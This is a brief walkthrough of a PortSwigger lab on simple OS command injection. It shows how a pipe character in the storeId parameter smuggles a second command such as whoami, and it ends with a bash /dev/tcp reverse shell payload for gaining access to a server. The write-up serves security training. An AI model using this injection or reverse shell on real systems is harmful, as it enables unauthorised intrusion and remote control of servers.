OS command injection, simple case
https://portswigger.net/web-security/os-command-injection/lab-simple
Level: Apprentice
The lab says that we need some way to execute the command
whoami
.Start doing some recon to see if you can see an interesting parameter on the POST requests or in the URL
The parameter in this lab is the
StoreId
.The application is getting the number of units using a regex on the system. Like ( " stockreport.pl 381 29 " or " stockreport.pl & echo aiwefwlguh & 29 ")
Remember that in Linux we can use a pipe to take STDOUT of command and transfer it to STDIN of the subsequent command.
To make a simple test we put a
"|" (pipe) <command>,
like in the following image.
In this case the code is not too much sanitized, but it gets more complicated than this.
Now if we want to get access to a server using this vulnerability, we can use the following payload: bash -c "bash -i >& /dev/tcp/<Your_IP>/<Port> 0>&1"
Last updated